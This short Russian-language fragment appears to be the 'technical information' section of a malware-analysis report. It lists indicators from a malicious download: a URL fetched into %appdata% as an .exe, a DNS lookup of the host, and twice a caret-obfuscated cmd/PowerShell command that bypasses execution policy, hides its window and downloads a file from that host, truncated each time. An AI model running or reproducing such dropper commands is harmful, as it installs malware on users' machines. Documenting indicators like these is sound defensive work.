Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWER^She^l^L.Ex^E -e^xEc^utI^on^POLICy ^b^ypa^S^s -N^o^P^rofI^L^e^ -^W^IN^dOwSty^LE ^h^I^Dd^EN (New^-^oBject^ s^Y^s^TEM.NE^t^.wE^BclIEn^t).dOwnL^OA^dF^ILe^(^'http://mondayhelt...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "PoWER^She^l^L.Ex^E -e^xEc^utI^on^POLICy ^b^ypa^S^s -N^o^P^rofI^L^e^ -^W^IN^dOwSty^LE ^h^I^Dd^EN (New^-^oBject^ s^Y^s^TEM.NE^t^.wE^BclIEn^t).dOwnL^OA^dF^ILe^(^'http://mondayhelt...' (со скрытым окном)